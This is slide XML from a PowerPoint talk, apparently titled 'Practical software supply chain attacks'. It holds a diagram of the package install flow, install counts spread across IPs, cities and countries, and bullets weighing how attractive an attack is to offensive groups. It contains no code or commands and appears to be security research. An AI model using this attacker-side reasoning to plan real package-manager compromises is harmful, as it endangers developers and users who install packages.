      <dgm:prSet presAssocID="{247B8D80-5ECA-4B76-9062-D16A0E6AA36E}" presName="adorn" presStyleLbl="fgAccFollowNode1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ADF47BE7-C211-4E1B-800B-5E50CC83867D}" type="pres">
      <dgm:prSet presAssocID="{94DDAC89-7953-4FF8-8255-5655538E1D3A}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{09A104F4-1254-4919-87FE-F3B5081194F4}" type="pres">
      <dgm:prSet presAssocID="{2098288F-4EE2-4C59-8924-27C2BDF61F55}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B7974FF-65E0-4279-9D64-49A3E534A19E}" type="pres">
      <dgm:prSet presAssocID="{2098288F-4EE2-4C59-8924-27C2BDF61F55}" presName="childRect" presStyleLbl="bgAcc1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C16144D-C8A1-46D2-84CC-A6CC455DE233}" type="pres">
      <dgm:prSet presAssocID="{2098288F-4EE2-4C59-8924-27C2BDF61F5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20134B-6BB1-43D4-9829-0F8716BFCF56}" type="pres">
      <dgm:prSet presAssocID="{2098288F-4EE2-4C59-8924-27C2BDF61F55}" presName="parentRect" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{64083EDA-43F7-4429-980A-607985B9EF8B}" type="pres">
      <dgm:prSet presAssocID="{2098288F-4EE2-4C59-8924-27C2BDF61F55}" presName="adorn" presStyleLbl="fgAccFollowNode1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{12A9DA15-7373-4225-AA21-4F801F9FC33B}" type="presOf" srcId="{CBD0C1B3-2026-4BF5-B593-4C5BD9AD51A4}" destId="{5B7974FF-65E0-4279-9D64-49A3E534A19E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{90966C29-32D3-4AE0-B383-C0C26F4FCA4D}" srcId="{6CA25B10-B729-406B-B12D-E84E39CD0F85}" destId="{4F029FA6-7CAD-4C14-A549-1AC11C5A1C7C}" srcOrd="0" destOrd="0" parTransId="{9770B960-7220-4375-B5E3-DA0601D69953}" sibTransId="{5E460D56-CEB1-4827-91DE-C3484B9BDA03}"/>
    <dgm:cxn modelId="{9E036D2F-5DC3-420C-B8DA-C3AF172B9AF7}" type="presOf" srcId="{247B8D80-5ECA-4B76-9062-D16A0E6AA36E}" destId="{AD94450F-CC56-40C6-BCD5-A3781778B155}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{501A5F32-6E50-46DE-87E5-631B76496EC4}" type="presOf" srcId="{2098288F-4EE2-4C59-8924-27C2BDF61F55}" destId="{D520134B-6BB1-43D4-9829-0F8716BFCF56}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{EAAE6637-4C41-4F37-9F78-4B59D5ABB9FB}" type="presOf" srcId="{AE1746C5-5A18-4000-B6C7-8F5E0DF8270B}" destId="{BC3CC8BF-D221-4236-9C22-320DBE217834}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{91716660-4206-4E15-92E7-CFBBDC1B33FE}" srcId="{698AD00A-BA31-4A10-BD79-726C45CEA4F3}" destId="{57EDF932-454E-4451-9913-6FA6D1157DA7}" srcOrd="0" destOrd="0" parTransId="{7684F3F4-2BF2-4002-852F-DF834536A9FE}" sibTransId="{25CE9857-DC01-4502-9CAC-D0554557DC3E}"/>
    <dgm:cxn modelId="{6E8B5E41-938C-4AF4-864B-E37DF7919D44}" type="presOf" srcId="{2098288F-4EE2-4C59-8924-27C2BDF61F55}" destId="{3C16144D-C8A1-46D2-84CC-A6CC455DE233}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{E6599F61-EEF8-4BF6-8C03-80E377BF860F}" type="presOf" srcId="{698AD00A-BA31-4A10-BD79-726C45CEA4F3}" destId="{644DB790-D66D-4861-A8E3-8AA300773F47}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{E69BD361-7EE8-4546-9B17-449882AE1D8D}" type="presOf" srcId="{6CA25B10-B729-406B-B12D-E84E39CD0F85}" destId="{FF73BD99-948B-4042-BC76-7132A6DF1F99}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{E3F20143-F29C-4535-BCCA-A7A1D9A2C04A}" srcId="{247B8D80-5ECA-4B76-9062-D16A0E6AA36E}" destId="{AE1746C5-5A18-4000-B6C7-8F5E0DF8270B}" srcOrd="0" destOrd="0" parTransId="{1941EDFE-534E-402A-AFF2-4806EA1CCFB3}" sibTransId="{BA77B4E4-0D67-425B-A52C-D962486E0E94}"/>
    <dgm:cxn modelId="{A8469346-1430-4237-B58C-0C00296F1319}" srcId="{698AD00A-BA31-4A10-BD79-726C45CEA4F3}" destId="{247B8D80-5ECA-4B76-9062-D16A0E6AA36E}" srcOrd="2" destOrd="0" parTransId="{ADF5C430-8476-4437-8C2F-AACF015A6B74}" sibTransId="{94DDAC89-7953-4FF8-8255-5655538E1D3A}"/>
    <dgm:cxn modelId="{DA5B6A53-4BC2-4733-B97E-DE7FAAE188D4}" type="presOf" srcId="{57EDF932-454E-4451-9913-6FA6D1157DA7}" destId="{F1739EDE-EB5E-44A0-A99F-4BC7363CA765}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{72862874-3287-4A32-825E-838479CF73A8}" srcId="{2098288F-4EE2-4C59-8924-27C2BDF61F55}" destId="{CBD0C1B3-2026-4BF5-B593-4C5BD9AD51A4}" srcOrd="0" destOrd="0" parTransId="{5466D29A-B242-4DB6-96B6-A2CA02F87F8D}" sibTransId="{42CFC9BC-160D-4D0B-9970-FB4A52E6BB61}"/>
    <dgm:cxn modelId="{5364057D-3889-4F5D-8DF0-7B1D358417E3}" type="presOf" srcId="{247B8D80-5ECA-4B76-9062-D16A0E6AA36E}" destId="{14CE5E54-2173-47A6-98F0-9F92A4EE59B9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{E31B9C96-F2D5-4987-A866-5BA98E53F511}" srcId="{57EDF932-454E-4451-9913-6FA6D1157DA7}" destId="{456439F6-8DAA-431C-8BBF-917E3AF25A03}" srcOrd="0" destOrd="0" parTransId="{7F3BF107-8FBB-491E-9B49-EF8F9D255C29}" sibTransId="{53651504-9616-47BE-8CB9-9054C49F9E56}"/>
    <dgm:cxn modelId="{0C7134B1-FA3F-4954-B38C-4A1E08448B9F}" type="presOf" srcId="{25CE9857-DC01-4502-9CAC-D0554557DC3E}" destId="{1096ADB8-62A5-4B80-B0D8-930D69AF67B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{06AB83B1-A937-4A8C-9B46-4A5335482320}" type="presOf" srcId="{57EDF932-454E-4451-9913-6FA6D1157DA7}" destId="{4FA2921F-4713-4EC7-809A-D464EF963FA6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{4EEF8DB2-B5C2-43D0-A80F-16B25AA4081E}" type="presOf" srcId="{C6B2B5AE-7853-49D9-B720-15A01679966A}" destId="{119EF5FB-F371-4BCA-A9E8-2920BF326A91}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{A27444CD-9C78-4FD5-A79B-973CE6059F06}" type="presOf" srcId="{6CA25B10-B729-406B-B12D-E84E39CD0F85}" destId="{E0904DA2-387F-478B-8A7E-EAC3E01D6C57}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{714FDAD3-562F-495C-BF96-088D6379A0B7}" srcId="{698AD00A-BA31-4A10-BD79-726C45CEA4F3}" destId="{2098288F-4EE2-4C59-8924-27C2BDF61F55}" srcOrd="3" destOrd="0" parTransId="{D8B9F87A-1478-414E-8A4A-E9EC2D5FE423}" sibTransId="{EA1B3FA4-C2FB-4223-9CA2-86F69E27ACFA}"/>
    <dgm:cxn modelId="{7DEE0EE6-09AB-42DE-B6E7-9CCEDCE03800}" srcId="{698AD00A-BA31-4A10-BD79-726C45CEA4F3}" destId="{6CA25B10-B729-406B-B12D-E84E39CD0F85}" srcOrd="1" destOrd="0" parTransId="{154EBBBC-58E9-4AA0-AC24-B09BEDF831EB}" sibTransId="{C6B2B5AE-7853-49D9-B720-15A01679966A}"/>
    <dgm:cxn modelId="{5022D3F0-493C-4906-A5C8-F6095F96FA77}" type="presOf" srcId="{456439F6-8DAA-431C-8BBF-917E3AF25A03}" destId="{2A49C364-092F-434E-BEE2-F88D6167D58E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{25977EF8-8D44-429A-B2E2-77EDA7A9C834}" type="presOf" srcId="{94DDAC89-7953-4FF8-8255-5655538E1D3A}" destId="{ADF47BE7-C211-4E1B-800B-5E50CC83867D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{FF503CFE-AC0E-4CFF-8934-ED1CDF881CFC}" type="presOf" srcId="{4F029FA6-7CAD-4C14-A549-1AC11C5A1C7C}" destId="{3DA75D89-7FCE-474D-A3BE-AC707ADFC6FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{5CFB2C6F-32D3-4E62-AE8F-B8CAD7A5A684}" type="presParOf" srcId="{644DB790-D66D-4861-A8E3-8AA300773F47}" destId="{EFF174E4-A2B4-4A8E-B511-EE592B22AD9A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{DDA95F92-1B0D-41DE-9DBF-5FA6D3E33CD6}" type="presParOf" srcId="{EFF174E4-A2B4-4A8E-B511-EE592B22AD9A}" destId="{2A49C364-092F-434E-BEE2-F88D6167D58E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{8D8D2A78-5FB6-427D-AD3E-157012448192}" type="presParOf" srcId="{EFF174E4-A2B4-4A8E-B511-EE592B22AD9A}" destId="{F1739EDE-EB5E-44A0-A99F-4BC7363CA765}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{5FC53648-2882-41E3-8BE2-8A41E19CEEB0}" type="presParOf" srcId="{EFF174E4-A2B4-4A8E-B511-EE592B22AD9A}" destId="{4FA2921F-4713-4EC7-809A-D464EF963FA6}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{6EE41F70-5C6C-4712-AB08-DE7D64E76B3D}" type="presParOf" srcId="{EFF174E4-A2B4-4A8E-B511-EE592B22AD9A}" destId="{677DEDF4-51B1-48B9-AA9A-8F6305310334}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{6E969632-123A-4793-BF0D-F6E43050B302}" type="presParOf" srcId="{644DB790-D66D-4861-A8E3-8AA300773F47}" destId="{1096ADB8-62A5-4B80-B0D8-930D69AF67B0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{690FFC18-1FE0-41B9-A3B2-795D3AA2742B}" type="presParOf" srcId="{644DB790-D66D-4861-A8E3-8AA300773F47}" destId="{26DF1996-971A-48BE-BFE9-FEF9E2774D7F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{28EF1D79-0AA7-4027-AC2F-235E24CA298B}" type="presParOf" srcId="{26DF1996-971A-48BE-BFE9-FEF9E2774D7F}" destId="{3DA75D89-7FCE-474D-A3BE-AC707ADFC6FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{D5CECC7E-A782-47EA-9FED-B1D0F8D6FF12}" type="presParOf" srcId="{26DF1996-971A-48BE-BFE9-FEF9E2774D7F}" destId="{FF73BD99-948B-4042-BC76-7132A6DF1F99}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{DFA554B8-EB54-493C-9B63-7A54AAB51DA7}" type="presParOf" srcId="{26DF1996-971A-48BE-BFE9-FEF9E2774D7F}" destId="{E0904DA2-387F-478B-8A7E-EAC3E01D6C57}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{C2F2760A-573E-4656-BC11-613D8F2E1BD2}" type="presParOf" srcId="{26DF1996-971A-48BE-BFE9-FEF9E2774D7F}" destId="{5209D1A6-5265-466F-BD2B-529B9D72026D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{AFD9EA69-2CC8-490D-8B0A-36F8FA8393E6}" type="presParOf" srcId="{644DB790-D66D-4861-A8E3-8AA300773F47}" destId="{119EF5FB-F371-4BCA-A9E8-2920BF326A91}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{20CB4D92-E4A1-447D-A138-73ECFB89F498}" type="presParOf" srcId="{644DB790-D66D-4861-A8E3-8AA300773F47}" destId="{8890C4C8-56F5-43E3-B590-8C05AC6C5F76}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{DE81DEEE-AE3D-491C-BED3-0CD0223C2191}" type="presParOf" srcId="{8890C4C8-56F5-43E3-B590-8C05AC6C5F76}" destId="{BC3CC8BF-D221-4236-9C22-320DBE217834}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{D2CAF5DB-AD49-4404-81A7-6AA247220C85}" type="presParOf" srcId="{8890C4C8-56F5-43E3-B590-8C05AC6C5F76}" destId="{AD94450F-CC56-40C6-BCD5-A3781778B155}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{1DFF8359-575A-4747-987D-A144F40F69A3}" type="presParOf" srcId="{8890C4C8-56F5-43E3-B590-8C05AC6C5F76}" destId="{14CE5E54-2173-47A6-98F0-9F92A4EE59B9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{070B99D8-A181-4EE1-80E6-55D4C88D8F0D}" type="presParOf" srcId="{8890C4C8-56F5-43E3-B590-8C05AC6C5F76}" destId="{ED5EE407-416C-426C-A9B5-42B9C5109138}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{69A2313A-95E4-4F78-94E8-74E4B546B014}" type="presParOf" srcId="{644DB790-D66D-4861-A8E3-8AA300773F47}" destId="{ADF47BE7-C211-4E1B-800B-5E50CC83867D}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{D000659E-D715-40FC-956E-20020A6B89FD}" type="presParOf" srcId="{644DB790-D66D-4861-A8E3-8AA300773F47}" destId="{09A104F4-1254-4919-87FE-F3B5081194F4}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{61C31110-BD20-4CCD-9C11-F30AC38507B6}" type="presParOf" srcId="{09A104F4-1254-4919-87FE-F3B5081194F4}" destId="{5B7974FF-65E0-4279-9D64-49A3E534A19E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{06C3969F-8BE4-46D2-9CFC-FF3934C428CA}" type="presParOf" srcId="{09A104F4-1254-4919-87FE-F3B5081194F4}" destId="{3C16144D-C8A1-46D2-84CC-A6CC455DE233}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{AFB15F67-026E-4878-B71F-E5BE698E575B}" type="presParOf" srcId="{09A104F4-1254-4919-87FE-F3B5081194F4}" destId="{D520134B-6BB1-43D4-9829-0F8716BFCF56}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bList2"/>
    <dgm:cxn modelId="{699D46E7-0BCF-4ABE-8631-857728555E9A}" type="presParOf" srcId="{09A104F4-1254-4919-87FE-F3B5081194F4}" destId="{64083EDA-43F7-4429-980A-607985B9EF8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C67D51-3619-49B4-A905-97BE25F4513D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4665" y="1468169"/>
          <a:ext cx="2715964" cy="10863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Developer </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200"/>
            <a:t>creates package</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="547858" y="1468169"/>
        <a:ext cx="1629579" cy="1086385"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3CA3F042-07E2-4C19-B7EB-F2E0C1DE649E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2449033" y="1468169"/>
          <a:ext cx="2715964" cy="10863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Developer submits to package manager</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2992226" y="1468169"/>
        <a:ext cx="1629579" cy="1086385"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7BCF2801-94ED-4039-AB92-47A67E99E4B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4893401" y="1468169"/>
          <a:ext cx="2715964" cy="10863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User types install command</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5436594" y="1468169"/>
        <a:ext cx="1629579" cy="1086385"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DD8169E2-093A-477A-89FA-DB96633F572C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7337769" y="1468169"/>
          <a:ext cx="2715964" cy="10863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Package &amp; dependencies are downloaded and installed</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7880962" y="1468169"/>
        <a:ext cx="1629579" cy="1086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9C364-092F-434E-BEE2-F88D6167D58E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6171" y="755695"/>
          <a:ext cx="2188594" cy="163373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hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alpha val="3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500" kern="1200" dirty="0"/>
            <a:t>442</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="44451" y="793975"/>
        <a:ext cx="2112034" cy="1595459"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4FA2921F-4713-4EC7-809A-D464EF963FA6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6171" y="2389434"/>
          <a:ext cx="2188594" cy="70250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3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Installs</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6171" y="2389434"/>
        <a:ext cx="1541263" cy="702508"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{677DEDF4-51B1-48B9-AA9A-8F6305310334}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1609347" y="2501021"/>
          <a:ext cx="766008" cy="76600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75D89-7FCE-474D-A3BE-AC707ADFC6FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2565129" y="755695"/>
          <a:ext cx="2188594" cy="163373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hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alpha val="3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500" kern="1200" dirty="0"/>
            <a:t>216</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2603409" y="793975"/>
        <a:ext cx="2112034" cy="1595459"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E0904DA2-387F-478B-8A7E-EAC3E01D6C57}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2565129" y="2389434"/>
          <a:ext cx="2188594" cy="70250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3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IP’s</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2565129" y="2389434"/>
        <a:ext cx="1541263" cy="702508"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5209D1A6-5265-466F-BD2B-529B9D72026D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4168305" y="2501021"/>
          <a:ext cx="766008" cy="76600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CC8BF-D221-4236-9C22-320DBE217834}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5124086" y="755695"/>
          <a:ext cx="2188594" cy="163373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hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alpha val="3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500" kern="1200" dirty="0"/>
            <a:t>147</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5162366" y="793975"/>
        <a:ext cx="2112034" cy="1595459"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{14CE5E54-2173-47A6-98F0-9F92A4EE59B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5124086" y="2389434"/>
          <a:ext cx="2188594" cy="70250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3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Cities</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5124086" y="2389434"/>
        <a:ext cx="1541263" cy="702508"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ED5EE407-416C-426C-A9B5-42B9C5109138}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6727262" y="2501021"/>
          <a:ext cx="766008" cy="76600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974FF-65E0-4279-9D64-49A3E534A19E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7683044" y="755695"/>
          <a:ext cx="2188594" cy="163373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hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alpha val="3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500" kern="1200" dirty="0"/>
            <a:t>45</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7721324" y="793975"/>
        <a:ext cx="2112034" cy="1595459"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D520134B-6BB1-43D4-9829-0F8716BFCF56}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7683044" y="2389434"/>
          <a:ext cx="2188594" cy="70250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3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Countries</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7683044" y="2389434"/>
        <a:ext cx="1541263" cy="702508"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{64083EDA-43F7-4429-980A-607985B9EF8B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9286220" y="2501021"/>
          <a:ext cx="766008" cy="76600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D9A93-74EF-4F2C-9018-C0BEE077FD85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CAFB5-2CCF-4803-B6C6-44938A55D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https://blog.malwarebytes.com/threat-analysis/2017/02/rogue-chrome-extension-pushes-tech-support-scam/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CAFB5-2CCF-4803-B6C6-44938A55D7E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2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4/17/2017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lanyrd.com/2013/rulu/scgxz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523925" cy="691816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56" y="6277231"/>
            <a:ext cx="6935739" cy="373345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Practical software supply chain attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="572682">
            <a:off x="6234622" y="5861733"/>
            <a:ext cx="37280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For everyone!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1182784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1562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Attack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possible to launch the attacks anonymously?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If strong attribution is required, it becomes less attractive to offensive groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting an app on the Apple store – painful to do anonymously; need to forge documents, use non-anonymous payment methods, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are there other barriers to submitting packages or launching the other attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every offensive group is resource-limited and most are task-saturated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an attack takes an inordinate amount of time or resources, it is not attractive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is the attack reliable?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How many actions does it require that the user make?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is it specific to a particular OS or privilege level?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does it execute immediately?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20641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758952"/>
            <a:ext cx="10664661" cy="3566160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
